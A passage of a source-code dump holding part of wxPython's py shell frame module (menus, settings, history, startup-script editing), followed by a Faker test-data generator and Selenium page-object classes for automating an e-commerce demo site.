m = self.optionsMenu = wx.Menu()
m.AppendSubMenu(self.autocompMenu, '&Auto Completion',
'Auto Completion Options')
m.AppendSubMenu(self.calltipsMenu, '&Call Tips', 'Call Tip Options')
m.AppendSeparator()
self.historyMenu = wx.Menu()
self.historyMenu.Append(ID_SAVEHISTORY, '&Autosave History',
'Automatically save history on close', wx.ITEM_CHECK)
self.historyMenu.Append(ID_SAVEHISTORYNOW, '&Save History Now',
'Save history')
self.historyMenu.Append(ID_CLEARHISTORY, '&Clear History ',
'Clear history')
m.AppendSubMenu(self.historyMenu, "&History", "History Options")
self.startupMenu = wx.Menu()
self.startupMenu.Append(ID_EXECSTARTUPSCRIPT,
'E&xecute Startup Script',
'Execute Startup Script', wx.ITEM_CHECK)
self.startupMenu.Append(ID_EDITSTARTUPSCRIPT,
'&Edit Startup Script...',
'Edit Startup Script')
if self.shellName in ['PySlices','SymPySlices']:
self.startupMenu.Append(ID_SHOWPYSLICESTUTORIAL,
'&Show PySlices Tutorial',
'Show PySlices Tutorial', wx.ITEM_CHECK)
m.AppendSubMenu(self.startupMenu, '&Startup', 'Startup Options')
self.settingsMenu = wx.Menu()
if self.shellName in ['PySlices','SymPySlices']:
self.settingsMenu.Append(ID_ENABLESHELLMODE,
'&Enable Shell Mode',
'Enable Shell Mode', wx.ITEM_CHECK)
if self.shellName == 'SymPySlices':
self.settingsMenu.Append(ID_ENABLEAUTOSYMPY,
'&Enable "Auto-Sympy" Conversions for Undefined Variables',
'Enable "Auto-Sympy" Conversions', wx.ITEM_CHECK)
self.settingsMenu.Append(ID_AUTO_SAVESETTINGS,
'&Auto Save Settings',
'Automatically save settings on close', wx.ITEM_CHECK)
self.settingsMenu.Append(ID_SAVESETTINGS,
'&Save Settings',
'Save settings now')
self.settingsMenu.Append(ID_DELSETTINGSFILE,
'&Revert to default',
'Revert to the default settings')
m.AppendSubMenu(self.settingsMenu, '&Settings', 'Settings Options')
m = self.helpMenu = wx.Menu()
m.Append(ID_HELP, '&Help\tF1', 'Help!')
m.AppendSeparator()
m.Append(ID_ABOUT, '&About...', 'About this program')
b = self.menuBar = wx.MenuBar()
b.Append(self.fileMenu, '&File')
b.Append(self.editMenu, '&Edit')
b.Append(self.viewMenu, '&View')
b.Append(self.optionsMenu, '&Options')
b.Append(self.helpMenu, '&Help')
self.SetMenuBar(b)
self.Bind(wx.EVT_MENU, self.OnFileNew, id=ID_NEW)
self.Bind(wx.EVT_MENU, self.OnFileOpen, id=ID_OPEN)
self.Bind(wx.EVT_MENU, self.OnFileRevert, id=ID_REVERT)
self.Bind(wx.EVT_MENU, self.OnFileClose, id=ID_CLOSE)
self.Bind(wx.EVT_MENU, self.OnFileSave, id=ID_SAVE)
self.Bind(wx.EVT_MENU, self.OnFileSaveAs, id=ID_SAVEAS)
self.Bind(wx.EVT_MENU, self.OnFileSaveACopy, id=ID_SAVEACOPY)
self.Bind(wx.EVT_MENU, self.OnFileUpdateNamespace, id=ID_NAMESPACE)
self.Bind(wx.EVT_MENU, self.OnFilePrint, id=ID_PRINT)
self.Bind(wx.EVT_MENU, self.OnExit, id=ID_EXIT)
self.Bind(wx.EVT_MENU, self.OnUndo, id=ID_UNDO)
self.Bind(wx.EVT_MENU, self.OnRedo, id=ID_REDO)
self.Bind(wx.EVT_MENU, self.OnCut, id=ID_CUT)
self.Bind(wx.EVT_MENU, self.OnCopy, id=ID_COPY)
self.Bind(wx.EVT_MENU, self.OnCopyPlus, id=ID_COPY_PLUS)
self.Bind(wx.EVT_MENU, self.OnPaste, id=ID_PASTE)
self.Bind(wx.EVT_MENU, self.OnPastePlus, id=ID_PASTE_PLUS)
self.Bind(wx.EVT_MENU, self.OnClear, id=ID_CLEAR)
self.Bind(wx.EVT_MENU, self.OnSelectAll, id=ID_SELECTALL)
self.Bind(wx.EVT_MENU, self.OnEmptyBuffer, id=ID_EMPTYBUFFER)
self.Bind(wx.EVT_MENU, self.OnAbout, id=ID_ABOUT)
self.Bind(wx.EVT_MENU, self.OnHelp, id=ID_HELP)
self.Bind(wx.EVT_MENU, self.OnAutoCompleteShow, id=ID_AUTOCOMP_SHOW)
self.Bind(wx.EVT_MENU, self.OnAutoCompleteMagic, id=ID_AUTOCOMP_MAGIC)
self.Bind(wx.EVT_MENU, self.OnAutoCompleteSingle, id=ID_AUTOCOMP_SINGLE)
self.Bind(wx.EVT_MENU, self.OnAutoCompleteDouble, id=ID_AUTOCOMP_DOUBLE)
self.Bind(wx.EVT_MENU, self.OnCallTipsShow, id=ID_CALLTIPS_SHOW)
self.Bind(wx.EVT_MENU, self.OnCallTipsInsert, id=ID_CALLTIPS_INSERT)
self.Bind(wx.EVT_MENU, self.OnWrap, id=ID_WRAP)
self.Bind(wx.EVT_MENU, self.OnToggleMaximize, id=ID_TOGGLE_MAXIMIZE)
self.Bind(wx.EVT_MENU, self.OnShowLineNumbers, id=ID_SHOW_LINENUMBERS)
self.Bind(wx.EVT_MENU, self.OnEnableShellMode, id=ID_ENABLESHELLMODE)
self.Bind(wx.EVT_MENU, self.OnEnableAutoSympy, id=ID_ENABLEAUTOSYMPY)
self.Bind(wx.EVT_MENU, self.OnAutoSaveSettings, id=ID_AUTO_SAVESETTINGS)
self.Bind(wx.EVT_MENU, self.OnSaveHistory, id=ID_SAVEHISTORY)
self.Bind(wx.EVT_MENU, self.OnSaveHistoryNow, id=ID_SAVEHISTORYNOW)
self.Bind(wx.EVT_MENU, self.OnClearHistory, id=ID_CLEARHISTORY)
self.Bind(wx.EVT_MENU, self.OnSaveSettings, id=ID_SAVESETTINGS)
self.Bind(wx.EVT_MENU, self.OnDelSettingsFile, id=ID_DELSETTINGSFILE)
self.Bind(wx.EVT_MENU, self.OnEditStartupScript, id=ID_EDITSTARTUPSCRIPT)
self.Bind(wx.EVT_MENU, self.OnExecStartupScript, id=ID_EXECSTARTUPSCRIPT)
self.Bind(wx.EVT_MENU, self.OnShowPySlicesTutorial, id=ID_SHOWPYSLICESTUTORIAL)
self.Bind(wx.EVT_MENU, self.OnFindText, id=ID_FIND)
self.Bind(wx.EVT_MENU, self.OnFindNext, id=ID_FINDNEXT)
self.Bind(wx.EVT_MENU, self.OnFindPrevious, id=ID_FINDPREVIOUS)
self.Bind(wx.EVT_MENU, self.OnToggleTools, id=ID_SHOWTOOLS)
self.Bind(wx.EVT_MENU, self.OnHideFoldingMargin, id=ID_HIDEFOLDINGMARGIN)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_NEW)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_OPEN)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_REVERT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CLOSE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SAVE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SAVEAS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_NAMESPACE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_PRINT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_UNDO)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_REDO)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CUT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_COPY)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_COPY_PLUS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_PASTE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_PASTE_PLUS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CLEAR)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SELECTALL)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_EMPTYBUFFER)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_AUTOCOMP_SHOW)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_AUTOCOMP_MAGIC)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_AUTOCOMP_SINGLE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_AUTOCOMP_DOUBLE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CALLTIPS_SHOW)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CALLTIPS_INSERT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_WRAP)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SHOW_LINENUMBERS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_ENABLESHELLMODE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_ENABLEAUTOSYMPY)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_AUTO_SAVESETTINGS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SAVESETTINGS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_DELSETTINGSFILE)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_EXECSTARTUPSCRIPT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SHOWPYSLICESTUTORIAL)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SAVEHISTORY)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SAVEHISTORYNOW)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_CLEARHISTORY)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_EDITSTARTUPSCRIPT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_FIND)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_FINDNEXT)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_FINDPREVIOUS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_SHOWTOOLS)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateMenu, id=ID_HIDEFOLDINGMARGIN)
self.Bind(wx.EVT_ACTIVATE, self.OnActivate)
self.Bind(wx.EVT_FIND, self.OnFindNext)
self.Bind(wx.EVT_FIND_NEXT, self.OnFindNext)
self.Bind(wx.EVT_FIND_CLOSE, self.OnFindClose)
def OnShowLineNumbers(self, event):
win = wx.Window.FindFocus()
if hasattr(win, 'lineNumbers'):
win.lineNumbers = event.IsChecked()
win.setDisplayLineNumbers(win.lineNumbers)
def OnToggleMaximize(self, event):
self.Maximize(not self.IsMaximized())
def OnFileNew(self, event):
self.bufferNew()
def OnFileOpen(self, event):
self.bufferOpen()
def OnFileRevert(self, event):
self.bufferRevert()
def OnFileClose(self, event):
self.bufferClose()
def OnFileSave(self, event):
self.bufferSave()
def OnFileSaveAs(self, event):
self.bufferSaveAs()
def OnFileSaveACopy(self, event):
self.bufferSaveACopy()
def OnFileUpdateNamespace(self, event):
self.updateNamespace()
def OnFilePrint(self, event):
self.bufferPrint()
def OnExit(self, event):
self.Close(False)
def OnUndo(self, event):
win = wx.Window.FindFocus()
win.Undo()
def OnRedo(self, event):
win = wx.Window.FindFocus()
win.Redo()
def OnCut(self, event):
win = wx.Window.FindFocus()
win.Cut()
def OnCopy(self, event):
win = wx.Window.FindFocus()
win.Copy()
def OnCopyPlus(self, event):
win = wx.Window.FindFocus()
win.CopyWithPrompts()
def OnPaste(self, event):
win = wx.Window.FindFocus()
win.Paste()
def OnPastePlus(self, event):
win = wx.Window.FindFocus()
win.PasteAndRun()
def OnClear(self, event):
win = wx.Window.FindFocus()
win.Clear()
def OnEmptyBuffer(self, event):
win = wx.Window.FindFocus()
d = wx.MessageDialog(self,
"Are you sure you want to clear the edit buffer,\n"
"deleting all the text?",
"Empty Buffer", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
answer = d.ShowModal()
d.Destroy()
if (answer == wx.ID_OK):
win.ClearAll()
if hasattr(win,'prompt'):
win.prompt()
def OnSelectAll(self, event):
win = wx.Window.FindFocus()
win.SelectAll()
def OnAbout(self, event):
"""Display an About window."""
title = 'About'
text = 'Your message here.'
dialog = wx.MessageDialog(self, text, title,
wx.OK | wx.ICON_INFORMATION)
dialog.ShowModal()
dialog.Destroy()
def OnHelp(self, event):
"""Display a Help window."""
title = 'Help'
text = "Type 'shell.help()' in the shell window."
dialog = wx.MessageDialog(self, text, title,
wx.OK | wx.ICON_INFORMATION)
dialog.ShowModal()
dialog.Destroy()
def OnAutoCompleteShow(self, event):
win = wx.Window.FindFocus()
win.autoComplete = event.IsChecked()
def OnAutoCompleteMagic(self, event):
win = wx.Window.FindFocus()
win.autoCompleteIncludeMagic = event.IsChecked()
def OnAutoCompleteSingle(self, event):
win = wx.Window.FindFocus()
win.autoCompleteIncludeSingle = event.IsChecked()
def OnAutoCompleteDouble(self, event):
win = wx.Window.FindFocus()
win.autoCompleteIncludeDouble = event.IsChecked()
def OnCallTipsShow(self, event):
win = wx.Window.FindFocus()
win.autoCallTip = event.IsChecked()
def OnCallTipsInsert(self, event):
win = wx.Window.FindFocus()
win.callTipInsert = event.IsChecked()
def OnWrap(self, event):
win = wx.Window.FindFocus()
win.SetWrapMode(event.IsChecked())
wx.CallLater(1, self.shell.EnsureCaretVisible)
def OnSaveHistory(self, event):
self.autoSaveHistory = event.IsChecked()
def OnSaveHistoryNow(self, event):
self.SaveHistory()
def OnClearHistory(self, event):
self.shell.clearHistory()
def OnEnableShellMode(self, event):
self.enableShellMode = event.IsChecked()
def OnEnableAutoSympy(self, event):
self.enableAutoSympy = event.IsChecked()
def OnHideFoldingMargin(self, event):
self.hideFoldingMargin = event.IsChecked()
def OnAutoSaveSettings(self, event):
self.autoSaveSettings = event.IsChecked()
def OnSaveSettings(self, event):
self.DoSaveSettings()
def OnDelSettingsFile(self, event):
if self.config is not None:
d = wx.MessageDialog(
self, "Do you want to revert to the default settings?\n" +
"A restart is needed for the change to take effect",
"Warning", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
answer = d.ShowModal()
d.Destroy()
if (answer == wx.ID_OK):
self.config.DeleteAll()
self.LoadSettings()
def OnEditStartupScript(self, event):
if hasattr(self, 'EditStartupScript'):
self.EditStartupScript()
def OnExecStartupScript(self, event):
self.execStartupScript = event.IsChecked()
self.SaveSettings(force=True)
def OnShowPySlicesTutorial(self,event):
self.showPySlicesTutorial = event.IsChecked()
self.SaveSettings(force=True)
def OnFindText(self, event):
if self.findDlg is not None:
return
win = wx.Window.FindFocus()
if self.shellName == 'PyCrust':
self.findDlg = wx.FindReplaceDialog(win, self.findData,
"Find",wx.FR_NOWHOLEWORD)
else:
self.findDlg = wx.FindReplaceDialog(win, self.findData,
"Find & Replace", wx.FR_NOWHOLEWORD|wx.FR_REPLACEDIALOG)
self.findDlg.Show()
def OnFindNext(self, event,backward=False):
if backward and (self.findData.GetFlags() & wx.FR_DOWN):
self.findData.SetFlags( self.findData.GetFlags() ^ wx.FR_DOWN )
elif not backward and not (self.findData.GetFlags() & wx.FR_DOWN):
self.findData.SetFlags( self.findData.GetFlags() ^ wx.FR_DOWN )
if not self.findData.GetFindString():
self.OnFindText(event)
return
if isinstance(event, wx.FindDialogEvent):
win = self.findDlg.GetParent()
else:
win = wx.Window.FindFocus()
win.DoFindNext(self.findData, self.findDlg)
if self.findDlg is not None:
self.OnFindClose(None)
def OnFindPrevious(self, event):
self.OnFindNext(event,backward=True)
def OnFindClose(self, event):
self.findDlg.Destroy()
self.findDlg = None
def OnToggleTools(self, event):
self.ToggleTools()
def OnUpdateMenu(self, event):
"""Update menu items based on current status and context."""
win = wx.Window.FindFocus()
id = event.GetId()
event.Enable(True)
try:
if id == ID_NEW:
event.Enable(hasattr(self, 'bufferNew'))
elif id == ID_OPEN:
event.Enable(hasattr(self, 'bufferOpen'))
elif id == ID_REVERT:
event.Enable(hasattr(self, 'bufferRevert')
and self.hasBuffer())
elif id == ID_CLOSE:
event.Enable(hasattr(self, 'bufferClose')
and self.hasBuffer())
elif id == ID_SAVE:
event.Enable(hasattr(self, 'bufferSave')
and self.bufferHasChanged())
elif id == ID_SAVEAS:
event.Enable(hasattr(self, 'bufferSaveAs')
and self.hasBuffer())
elif id == ID_SAVEACOPY:
event.Enable(hasattr(self, 'bufferSaveACopy')
and self.hasBuffer())
elif id == ID_NAMESPACE:
event.Enable(hasattr(self, 'updateNamespace')
and self.hasBuffer())
elif id == ID_PRINT:
event.Enable(hasattr(self, 'bufferPrint')
and self.hasBuffer())
elif id == ID_UNDO:
event.Enable(win.CanUndo())
elif id == ID_REDO:
event.Enable(win.CanRedo())
elif id == ID_CUT:
event.Enable(win.CanCut())
elif id == ID_COPY:
event.Enable(win.CanCopy())
elif id == ID_COPY_PLUS:
event.Enable(win.CanCopy() and hasattr(win, 'CopyWithPrompts'))
elif id == ID_PASTE:
event.Enable(win.CanPaste())
elif id == ID_PASTE_PLUS:
event.Enable(win.CanPaste() and hasattr(win, 'PasteAndRun'))
elif id == ID_CLEAR:
event.Enable(win.CanCut())
elif id == ID_SELECTALL:
event.Enable(hasattr(win, 'SelectAll'))
elif id == ID_EMPTYBUFFER:
event.Enable(hasattr(win, 'ClearAll') and not win.GetReadOnly())
elif id == ID_AUTOCOMP_SHOW:
event.Check(win.autoComplete)
elif id == ID_AUTOCOMP_MAGIC:
event.Check(win.autoCompleteIncludeMagic)
elif id == ID_AUTOCOMP_SINGLE:
event.Check(win.autoCompleteIncludeSingle)
elif id == ID_AUTOCOMP_DOUBLE:
event.Check(win.autoCompleteIncludeDouble)
elif id == ID_CALLTIPS_SHOW:
event.Check(win.autoCallTip)
elif id == ID_CALLTIPS_INSERT:
event.Check(win.callTipInsert)
elif id == ID_WRAP:
event.Check(win.GetWrapMode())
elif id == ID_SHOW_LINENUMBERS:
event.Check(win.lineNumbers)
elif id == ID_ENABLESHELLMODE:
event.Check(self.enableShellMode)
event.Enable(self.config is not None)
elif id == ID_ENABLEAUTOSYMPY:
event.Check(self.enableAutoSympy)
event.Enable(self.config is not None)
elif id == ID_AUTO_SAVESETTINGS:
event.Check(self.autoSaveSettings)
event.Enable(self.config is not None)
elif id == ID_SAVESETTINGS:
event.Enable(self.config is not None and
hasattr(self, 'DoSaveSettings'))
elif id == ID_DELSETTINGSFILE:
event.Enable(self.config is not None)
elif id == ID_EXECSTARTUPSCRIPT:
event.Check(self.execStartupScript)
event.Enable(self.config is not None)
elif id == ID_SHOWPYSLICESTUTORIAL:
event.Check(self.showPySlicesTutorial)
event.Enable(self.config is not None)
elif id == ID_SAVEHISTORY:
event.Check(self.autoSaveHistory)
event.Enable(self.dataDir is not None)
elif id == ID_SAVEHISTORYNOW:
event.Enable(self.dataDir is not None and
hasattr(self, 'SaveHistory'))
elif id == ID_CLEARHISTORY:
event.Enable(self.dataDir is not None)
elif id == ID_EDITSTARTUPSCRIPT:
event.Enable(hasattr(self, 'EditStartupScript'))
event.Enable(self.dataDir is not None)
elif id == ID_FIND:
event.Enable(hasattr(win, 'DoFindNext'))
elif id == ID_FINDNEXT:
event.Enable(hasattr(win, 'DoFindNext'))
elif id == ID_FINDPREVIOUS:
event.Enable(hasattr(win, 'DoFindNext'))
elif id == ID_SHOWTOOLS:
event.Check(self.ToolsShown())
elif id == ID_HIDEFOLDINGMARGIN:
event.Check(self.hideFoldingMargin)
event.Enable(self.config is not None)
else:
event.Enable(False)
except AttributeError:
# This menu option is not supported in the current context.
event.Enable(False)
def OnActivate(self, event):
"""
Event Handler for losing the focus of the Frame. Should close
Autocomplete listbox, if shown.
"""
if not event.GetActive():
# If autocomplete active, cancel it. Otherwise, the
# autocomplete list will stay visible on top of the
# z-order after switching to another application
win = wx.Window.FindFocus()
if hasattr(win, 'AutoCompActive') and win.AutoCompActive():
win.AutoCompCancel()
event.Skip()
def LoadSettings(self, config):
"""Called by derived classes to load settings specific to the Frame"""
pos = wx.Point(config.ReadInt('Window/PosX', -1),
config.ReadInt('Window/PosY', -1))
size = wx.Size(config.ReadInt('Window/Width', -1),
config.ReadInt('Window/Height', -1))
self.SetSize(size)
self.Move(pos)
def SaveSettings(self, config):
"""Called by derived classes to save Frame settings to a wx.Config object"""
# TODO: track position/size so we can save it even if the
# frame is maximized or iconized.
if not self.iconized and not self.IsMaximized():
w, h = self.GetSize()
config.WriteInt('Window/Width', w)
config.WriteInt('Window/Height', h)
px, py = self.GetPosition()
config.WriteInt('Window/PosX', px)
config.WriteInt('Window/PosY', py)
class ShellFrameMixin:
"""
A mix-in class for frames that will have a Shell or a Crust window
and that want to add history, startupScript and other common
functionality.
"""
def __init__(self, config, dataDir):
self.config = config
self.dataDir = dataDir
self.startupScript = os.environ.get('PYTHONSTARTUP')
if not self.startupScript and self.dataDir:
self.startupScript = os.path.join(self.dataDir, 'startup')
self.autoSaveSettings = False
self.autoSaveHistory = False
# We need this one before we have a chance to load the settings...
self.execStartupScript = True
self.showPySlicesTutorial = True
self.enableShellMode = False
self.enableAutoSympy = True
self.hideFoldingMargin = False
if self.config:
self.execStartupScript = \
self.config.ReadBool('Options/ExecStartupScript', True)
self.showPySlicesTutorial = \
self.config.ReadBool('Options/ShowPySlicesTutorial', True)
self.enableShellMode = \
self.config.ReadBool('Options/EnableShellMode', False)
self.enableAutoSympy = \
self.config.ReadBool('Options/EnableAutoSympy', True)
self.hideFoldingMargin = \
self.config.ReadBool('Options/HideFoldingMargin', True)
def OnHelp(self, event):
"""Display a Help window."""
import wx.lib.dialogs
title = 'Help on key bindings'
text = wx.py.shell.HELP_TEXT
dlg = wx.lib.dialogs.ScrolledMessageDialog(self, text, title,
size = ((700, 540)))
fnt = wx.Font(10, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
dlg.GetChildren()[0].SetFont(fnt)
dlg.GetChildren()[0].SetInsertionPoint(0)
dlg.ShowModal()
dlg.Destroy()
def LoadSettings(self):
if self.config is not None:
self.autoSaveSettings = \
self.config.ReadBool('Options/AutoSaveSettings', False)
self.execStartupScript = \
self.config.ReadBool('Options/ExecStartupScript', True)
self.autoSaveHistory = \
self.config.ReadBool('Options/AutoSaveHistory', False)
self.showPySlicesTutorial = \
self.config.ReadBool('Options/ShowPySlicesTutorial', True)
self.enableShellMode = \
self.config.ReadBool('Options/EnableShellMode', False)
self.enableAutoSympy = \
self.config.ReadBool('Options/EnableAutoSympy', True)
self.hideFoldingMargin = \
self.config.ReadBool('Options/HideFoldingMargin', True)
self.LoadHistory()
def SaveSettings(self, force=False):
if self.config is not None:
# always save these
self.config.WriteBool('Options/AutoSaveSettings',
self.autoSaveSettings)
if self.autoSaveSettings or force:
self.config.WriteBool('Options/AutoSaveHistory',
self.autoSaveHistory)
self.config.WriteBool('Options/ExecStartupScript',
self.execStartupScript)
self.config.WriteBool('Options/ShowPySlicesTutorial',
self.showPySlicesTutorial)
self.config.WriteBool('Options/EnableShellMode',
self.enableShellMode)
self.config.WriteBool('Options/EnableAutoSympy',
self.enableAutoSympy)
self.config.WriteBool('Options/HideFoldingMargin',
self.hideFoldingMargin)
if self.autoSaveHistory:
self.SaveHistory()
def SaveHistory(self):
if self.dataDir:
try:
name = os.path.join(self.dataDir, 'history')
f = open(name, 'wb')
hist = []
enc = 'utf-8'
for h in self.shell.history:
h = h.encode(enc)
hist.append(h)
hist = b'\x00\n'.join(hist)
f.write(hist)
f.close()
except:
d = wx.MessageDialog(self, "Error saving history file.",
"Error", wx.ICON_EXCLAMATION|wx.OK)
d.ShowModal()
d.Destroy()
raise
def LoadHistory(self):
if self.dataDir:
name = os.path.join(self.dataDir, 'history')
if os.path.exists(name):
try:
f = open(name, 'rb')
hist = f.read()
f.close()
enc = 'utf-8'
hist = [h.decode(enc) for h in hist.split(b'\x00\n')]
self.shell.history = hist
dispatcher.send(signal="Shell.loadHistory",
history=self.shell.history)
except:
import traceback
traceback.print_exc()
d = wx.MessageDialog(self, "Error loading history file.",
"Error", wx.ICON_EXCLAMATION|wx.OK)
d.ShowModal()
d.Destroy()
def bufferHasChanged(self):
# the shell buffers can always be saved
return True
def bufferSave(self):
import time
appname = wx.GetApp().GetAppName()
default = appname + '-' + time.strftime("%Y%m%d-%H%M.py")
fileName = wx.FileSelector("Save File As", "Saving",
default_filename=default,
default_extension="py",
wildcard="*.py",
flags = wx.SAVE | wx.OVERWRITE_PROMPT)
if not fileName:
return
text = self.shell.GetText()
## This isn't working currently...
## d = wx.MessageDialog(self,u'Save source code only?\n' + \
## 'Answering yes will only save lines starting with >>> and ...',
## u'Question', wx.YES_NO | wx.ICON_QUESTION)
## yes_no = d.ShowModal()
## if yes_no == wx.ID_YES:
## m = re.findall('^[>\.]{3,3} (.*)\r', text, re.MULTILINE | re.LOCALE)
## text = '\n'.join(m)
## d.Destroy()
try:
f = open(fileName, "w")
f.write(text)
f.close()
except:
d = wx.MessageDialog(self, u'Error saving session',u'Error',
wx.OK | wx.ICON_ERROR)
d.ShowModal()
d.Destroy()
def EditStartupScript(self):
if os.path.exists(self.startupScript):
import io
# Use newline=None to translate \n \r \r\n to \n on read. The
# old-style mode='U' is deprecated.
text = io.open(self.startupScript, 'r',
newline=None, encoding='utf-8').read()
else:
text = ''
dlg = EditStartupScriptDialog(self, self.startupScript, text)
if dlg.ShowModal() == wx.ID_OK:
text = dlg.GetText()
try:
f = open(self.startupScript, 'wb')
f.write(text.encode('utf-8'))
f.close()
except:
d = wx.MessageDialog(self, "Error saving startup file.",
"Error", wx.ICON_EXCLAMATION|wx.OK)
d.ShowModal()
d.Destroy()
class EditStartupScriptDialog(wx.Dialog):
def __init__(self, parent, fileName, text):
wx.Dialog.__init__(self, parent, size=(425,350),
title="Edit Startup Script",
style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER)
pst = wx.StaticText(self, -1, "Path:")
ptx = wx.TextCtrl(self, -1, fileName, style=wx.TE_READONLY)
self.editor = editwindow.EditWindow(self)
self.editor.SetText(text)
wx.CallAfter(self.editor.SetFocus)
ok = wx.Button(self, wx.ID_OK)
cancel = wx.Button(self, wx.ID_CANCEL)
mainSizer = wx.BoxSizer(wx.VERTICAL)
pthSizer = wx.BoxSizer(wx.HORIZONTAL)
pthSizer.Add(pst, flag=wx.ALIGN_CENTER_VERTICAL)
pthSizer.Add((5,5))
pthSizer.Add(ptx, 1)
mainSizer.Add(pthSizer, 0, wx.EXPAND|wx.ALL, 10)
mainSizer.Add(self.editor, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 10)
btnSizer = wx.BoxSizer(wx.HORIZONTAL)
btnSizer.Add((5,5), 1)
btnSizer.Add(ok)
btnSizer.Add((5,5), 1)
btnSizer.Add(cancel)
btnSizer.Add((5,5), 1)
mainSizer.Add(btnSizer, 0, wx.EXPAND|wx.ALL, 10)
self.SetSizer(mainSizer)
self.Layout()
def GetText(self):
return self.editor.GetText()
```
#### File: web_aaaaaaaa/common/fakerdata.py
```python
from faker import Faker
# f=Faker(locale="zh_CN")
#
# print(f.name()) # 随机生成用户名
# print(f.address())
# print(f.email())
# print(f.phone_number())
# print(f.random_int(min=0,max=999999999))
class RegisterData:
def __init__(self):
self.fk = Faker(locale="zh_CN")
# def username(self):
# """生成用户名"""
# return self.fk.name()
#
# def password(self):
# """生成密码"""
# return self.fk.password()
#
# def email(self):
# """生成邮箱"""
# return self.fk.email()
#
# def phone_number(self):
# """生成手机号码"""
# return self.fk.phone_number()
def get_data_for_list(self):
"""将生成的数据集合成列表"""
data = [self.fk.name(),self.fk.password(),self.fk.email(),self.fk.phone_number()]
return data
if __name__ == '__main__':
register = RegisterData()
print(register.get_data_for_list())
```
#### File: web_aaaaaaaa/page/cancel_page.py
```python
from common.base import Base
class Cancel(Base):
cancel_loc = ('link text','取消订单')
def cancel(self):
self.click(self.cancel_loc)
```
#### File: web_aaaaaaaa/page/goods_list_page.py
```python
from common.base import Base
from time import sleep
url = "http://ecshop.itsoso.cn/"
class Goodslist_Page(Base):
"""封装表现层:制作定位器"""
# 首页元素的定位
first_page_loc = ("link text", "首页")
send_loc = ("name", "keywords")
search_loc = ("value", "搜索")
def click_first(self):
"""点击首页"""
self.click(self.first_page_loc)
def get_goods_text(self, locator):
"""获取商品文本"""
goods_elements = self.find_elements(locator)
texts = []
for goods_element in goods_elements:
text = goods_element.text # 获取单个商品的文本
texts.append(text)
return texts
def click_texts(self, locator1,locator2):
"""
:param locator1: 商品类的元素定位器
:param locator2: 商品列表的定位器
:return:
"""
# 取出商品类的所有文本
texts = self.get_goods_text(locator1)
for text in texts:
good_loc = ("link text", text)
self.click(good_loc)
self.click_all_element(locator2)
def get_goods_title(self, locator):
"""获取商品标题"""
goods_elements = self.find_elements(locator)
# 获取商品标题
titles = [] # 准备一个列表装商品标题
for goods_element in goods_elements:
# title就是表示元素的属性值
title = goods_element.get_attribute("title")
titles.append(title)
return titles
def click_all_element(self, locator):
"""点击所有元素"""
titles = self.get_goods_title(locator)
for title in titles:
# 重新制作单个商品的定位器
goods_loc = ("css selector", f"a[title='{title}']")
self.click(goods_loc)
self.back()
self.next_page()
def next_page(self):
# 下一页的定位器
next_loc = ("link text", "下一页")
# 点击下一页
# 判断有没有下一页的元素,有就点击元素,没有就返回首页
while True:
if self.displayed(next_loc):
